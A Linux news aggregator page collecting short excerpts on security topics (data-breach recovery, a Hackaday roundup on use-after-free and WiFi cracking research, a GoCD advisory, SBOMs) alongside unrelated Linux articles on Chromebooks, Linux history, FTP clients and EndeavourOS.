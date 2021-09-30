Language Selection

Security Leftovers

Submitted by Roy Schestowitz on Friday 29th of October 2021 07:41:30 PM
Security
  • #6 Cybersec Charcha: What comes after Breach Pe Breach?

    In previous editions of Cybersec Charcha, we discussed what you could do to protect your data from being stolen and how to best implement strong digital security practices to protect yourself and your sensitive information. However, we haven’t yet looked at what you can do to take back control — if your data has already been compromised in a data breach.

    Data breaches are now becoming increasingly common. In 2021 alone, we have seen some of the most serious instances of data breaches — both in India and around the world. In a scenario like this, it becomes really important to learn not only how you can protect yourself, but also the measures you can take if your data is leaked in a data breach.

    In the sixth edition of Cybersec Charcha, we’ll be exploring what you can do to take back control in the aftermath of a data breach.

  • This Week In Security: Use-After-Free For Dummies, WiFi Cracking, And PHP-FPM | Hackaday

    In a brilliant write-up, [Stephen Tong] brings us his “Use-After-Free for Dummies“. It’s a surprising tale of a vulnerability that really shouldn’t exist, and a walkthrough of how to complete a capture the flag challenge. The vulnerable binary is running on a Raspberry Pi, which turns out to be very important. It’s a multithreaded application that uses lock-free data sharing, through pair of integers readable by multiple threads. Those ints are declared using the volatile keyword, which is a useful way to tell a compiler not to optimize too heavily, as this value may get changed by another thread.

    [...]

    [Ido Hoorvitch] of CyberArk had some pandemic induced time on his hands, and opted to collect packet captures of 5000 password protected WiFi networks around Tel Aviv. In the old days, you had to capture a 4-way handshake to have any chance at breaking WPA encryption. In 2018 a new technique was discovered, where a single authentication response was all that was required to attempt to crack the key — no active user required.

  • GoCD Authentication Vulnerability | CISA

    GoCD has released a security update to address a critical authentication vulnerability in GoCD versions 20.6.0 through 21.2.0. GoCD is an open-source Continuous Integration and Continuous Delivery system. A remote attacker could exploit this vulnerability to obtain sensitive information.

  • Codenotary: Notarize and verify your software bill of materials [Ed: At ZDNet, SJVN has become a lot like a marketing operative of Linux Foundation because that's a client. The problem is, the Linux Foundation and Linux aren't the same thing. SJVN leans to the money, not GNU/Linux.]

    The Solarwinds software supply chain attack is the one everyone knows about. But supply chain attacks are becoming commonplace, and that's bad news. There are efforts afoot, such as the Linux Foundation's Software Package Data Exchange® (SPDX) project, which ensures transparency and improves compliance for software bill of materials (SBOM). But, we need SBOMs now.

How Ubuntu Brought My Ancient Chromebook Back from the Dead

Alright, I’m not exactly Dr Frankenstein, but I did exhume the corpse of a forgotten Chromebook from its eternal resting place (my bookcase) to enact a macabre ritual. My goal? To bring it back to life. Thankfully I didn’t need any spare body parts or a maniacal god complex for my resurrection, just a few choice terminal commands and an Ubuntu-based Linux distro called Gallium OS. I’ll get to what Gallium OS is in a bit, but first I need to answer the question you’re probably thinking in your head: “Chromebooks run Chrome OS. It is a Gentoo-based Linux distro. Why do you need to do this?”. Read more

Looking back on 30 years of Linux history with Red Hat's Ethan Dicks

I first encountered Linux through the Usenet post because I was a very avid Usenet reader and contributor—starting in about ‘85 or so. I saw the Andrew Tanenbaum post about the release of Minix and newsgroups were created for that, so that was an exciting chance to have [something like] Unix on desktop-grade hardware. I’d been running Unix at work since ‘84, ‘85 and had tried (on a number of occasions) to gather enough hardware to be able to run it at home and just really couldn't ever afford to put it together because disks were expensive. I remember when that famous first message came out from Linus [Torvalds]. I was not a PC guy at the time. By April of 1992, which was five months after that announcement, I was at a computer show at a fairgrounds and felt that things had gotten cheap enough. So, I went and bought a 386 motherboard and four megabytes of RAM (in April of 1992, it was $35 per megabyte!) specifically to run Linux, popped on a drive, brought it home and put together a PC. Read more

The 5 Best FTP Clients for Linux

Want to transfer files to and from a remote server in Linux? Check out these powerful FTP clients that will help you transfer your data securely. FTP or File Transfer Protocol is the most common method of transferring files between computers over a network. It's also the go-to option to move large amounts of files back and forth from/to a server. As such, you'll find a variety of FTP clients, depending on your operating system, to help you with the same, each promising to deliver better transfer and management features than the other while staying true to its core functionality. Read more

Distrowatch Top 5 Distributions Review: EndeavourOS

It's no secret to anyone who has read my distro reviews in the past that I love Arch and Arch based systems...and EndeavourOS is no exception. If you love Arch, and you want Arch with a nice graphical installer, easy desktop environment choosing and installation, minimal bloat, and a great and friendly community, give EndeavourOS a try; I highly doubt you will be disappointed. Frankly, I have used EndeavourOS multiple times in the past, and I always come back to it unless I need an Ubuntu system or something else for some specific reason. I used to use Manjaro a lot, but EndeavourOS took my #1 spot when it came to Arch based systems. But, with that said, Manjaro and other systems are absolutely awesome too, and have some perks that EndeavourOS does not; but I'll save that for the Manjaro review coming in the near future. Read more

